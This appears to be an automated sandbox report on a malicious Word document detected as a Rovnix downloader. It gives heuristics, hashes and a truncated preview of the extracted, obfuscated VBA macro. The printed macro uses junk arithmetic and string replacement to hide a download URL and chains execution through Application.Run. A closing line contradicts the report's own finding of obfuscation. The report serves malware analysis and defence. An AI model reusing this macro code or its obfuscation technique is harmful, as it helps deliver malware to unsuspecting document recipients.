Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically an Auto_Close macro that uses CreateObject to execute code. ClamAV identifies the file as Doc.Downloader.Rovnix-6497736-0, indicating a downloader family. The VBA code, though obfuscated, contains calls to Application.Run, suggesting it's designed to execute further malicious actions, likely downloading a payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Rovnix-6497736-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): document contains a VBA project; VBA macros present
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14386 bytes |

SHA-256: 13165f5940627566da4fae44e2b6ea301519d4f1e9c0d7b561a15ba97c04b1a7

Preview (script): first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub yfdkwJYAbVJLQv()
NzyHEvQBx = Acos(1508) - Acos(162) - Acos(1807) - Acos(2788) - 4087 - Acos(1289) - 2506
WZAoVQBLzi = LTrim("GFLAAMAoufEyoWQXQWH") + LTrim("FSSIbYKcOiExnALzvBQGIug") + "wYcvNAHnYwnprGPfy" + RTrim("QvbxYNPkSZMKNHUb")
iFUwBrzI = RTrim("ROMIgzRoRTcRkVvbUViWjNAgNLNL") + "ojWFRWxEgTwxinMbDJPWvzxgkoUY"
AWXiyQiygdK = "gUFwrZHgEyIJGAgcJZcWAwUxk" + "HCJTUAZHQGiqEPbBRxirTozwxJwNID" + "iGuFwrnn" + RTrim("FrKWMZVXSJio")
ByqOkOSCObZ = LTrim("MAoVy") + RTrim("PuVvWEgPojoDfrCvEEHIZXPoB")
Application.Run "giCTYCBYxZEKTw"
bPqHVEJEEYNB = "SOxBqHNcIrg" + Left("CUVbCWIOXE", 10) + Left("GbQLxgPVQq", 4) + "JKxingMridcxdqL" + "EMLNUzfXHWSqcN"
XBKDUxBPFik = Acos(1477) + Acos(3775) + 4212 + Acos(3440) + 1944 + 162
End Sub
Sub fZiPfMZyyirJIX()
nzGkLRgQ = "BYOfbWKPodfrnHTIDowoqkyf" + LTrim("YAbVJLQvgiCTYCBYxZEK") + RTrim("EQWgZbzrwryV")
iPfMZyyirJIX = 2946 - 824 - Acos(1432) - 1593 - Acos(3901)
GkkqyzNYGV = "qJvoKfPbxKkoHpDxcjpIW" + LTrim("SukBRfkbCiIVNzgTTzMdNicpLYnIFX") + "DSxYJbKMQycOWFozFGyHIf"
Application.Run "TAujwkNOTyHRfBx"
OgISkDzKWHJ = 39 + Acos(3113) + 4588 + Acos(4635) + 2130 + Acos(860)
dkJyJwguqz = "qoEQRwCVn" + "NFxnpfYvf" + LTrim("uYK") + "RF"
OcGTWACNvdH = RTrim("pNgW") + "bjp" + "ToUQKqTiqiCXNZ" + LTrim("EvnjiwUyPMRDryHoZS")
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function dXWgMfjVpCXpXZvKC(VrgOHYkMAIHkq, bTznDbOFKvHPFc, PRTOfDZpIpkIUgJOR)
NXPbBbYGu = "KoSPuucMbz" + "igOgDUdVnXELq" + "uxOEzJN" + "nvN" + "HTIVWiMG"
QvHBHPB = "f" + "ocBDRFLqNfNQrfJwvDbJnSYUO"
GGUAHCvuvSyg = Acos(4199) - Acos(2388) - 1101
CJkpyikVgRi = Left("PryyDxiVOO", 2) + "KkipzjKb" + Left("HCbYxMQZXq", 7) + "TcVvi"
dXWgMfjVpCXpXZvKC = Replace(VrgOHYkMAIHkq, bTznDbOFKvHPFc, PRTOfDZpIpkIUgJOR)
BWAToDfUP = Left("PUZYYnIXJF", 5) + "bUoLCOvWAwqfXV" + Left("IiEBFpciwY", 8) + "DQvIKnoBd" + Left("RddQSBWiuK", 10)
ZKzJbwjoQAqI = Acos(2880) + 879 + 639
vOJHwOpr = Acos(680) + 489 + Acos(4165) + Acos(3316)
UCzqSixukYX = Left("PqrXqqANFd", 3) + Left("TEJwzKpFVB", 7) + "CEiYH"
wcYFCwvR = 3819 + 51 + Acos(2823) + 4502
WROfuUViv = 1560 - Acos(1685) - 3322 - 1505 - 364
qHnUHLgfqkgN = Acos(1809) + 1501 + 3451 + 2168
qngbIgoIBH = "iPLZoVgbpZNwKkRUBbfWgHNvFECBrW" + RTrim("LLYUdZwkAyU") + "FPDuQPibIUIkBnkJrrEOHq" + LTrim("bQZNdWDVQdxvydFIIqCSLE")
iooXWQORP = Acos(1682) + 894 + 2776 + Acos(3606) + 1993 + 4001 + Acos(4352)
vdCgnNR = RTrim("rborHnruAIywnOILMG") + "FxDQJGWGv" + RTrim("dWRTdzBiSNPUCbGdJd")
CUfNgJcP = "AzynzTEKX" + RTrim("QzcbCIKD") + "yAwOWWu" + RTrim("NuJQTdbPwvzKSSiYyRcJHXAjF")
CZTNwxRT = Acos(2583) + Acos(1968) + 2725
TMJoKBTD = "qVKrYxVP" + Left("jPPFiGrWdd", 7) + Left("GzujXBXpFu", 6)
End Function
Sub TAujwkNOTyHRfBx()
RpJONvqHo = Acos(927) + 2621 + Acos(2438) + Acos(3396) + 3733 + 2343 + Acos(1548)
VjSzovVzfNb = "WVLgBwJxEDkAf" + "IOwSfFVxWy" + "Wiuq"
qXnioRTAEXy = "LoiVKZ" + "ndnBUIfMLcAY" + Left("fqBSyZijnk", 3)
AEXZWwzqWC = "SFCKrfvbxxzFKjgO" + "FSEdBx"
qobqgYZuTHuonAx = "ZbHyKOuornUnoopqOUzUwjWBhZuTnHAMiqcNACdHjdRkucQxo hZuTnHAMiqcNAZuTnHAMiqcNAp://qdkngijbqnwnQObPYpWycAZhiqwrbzudwnQObPYpWycAZ.coZbHyKOuornUn/REX/oopqOUzUwjWBFDxoJqUwTGCvick.php?uZuTnHAMiqcNAZbHyKOuornUnCdHjdRkucQxo=boZbHyKOuornUnb"
qobqgYZuTHuonAx = dXWgMfjVpCXpXZvKC(qobqgYZuTHuonAx, "ZbHyKOuornUn", "m")
uKRNUvNipoSO = Left("JWITLciczk", 10) + "kOqy"
YTjTcZLWHA = 3095 - Acos(2909) - 1953
VNcHLRi = LTrim("BRrPC") + RTrim("AIVDowIXXUxjoZFGgSXkokWAK") + LTrim("L") + LTrim("vuvpfUYqJWVHwXoAdWDDfrUc")
IbBNJIjJVQw = 3277 - Acos(1437) - 362 - 3558 - Acos(2641)
qobqgYZuTHuonAx = dXWgMfjVpCXpXZvKC(qobqgYZuTHuonAx, "CdHjdRkucQxo", "a")
vxOuRnMIykCi = Acos(2841) - 4323 - Acos(2167) - Acos(2103) - 3757 - 2019 - Acos(4505) - 1981 - 1147
iMdvbGYUFdW = "iHnnFWCkcHOX" + LTrim("KLLOLuPBLINvwXbAViJ") +
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 39424 bytes |

SHA-256: 556e18a1bec0615e10511745cd9c66c14d3ffd1b0050771fc3e9492abb820850

Detection
- ClamAV: Doc.Downloader.Rovnix-6497736-0
- Obfuscation or payload: unlikely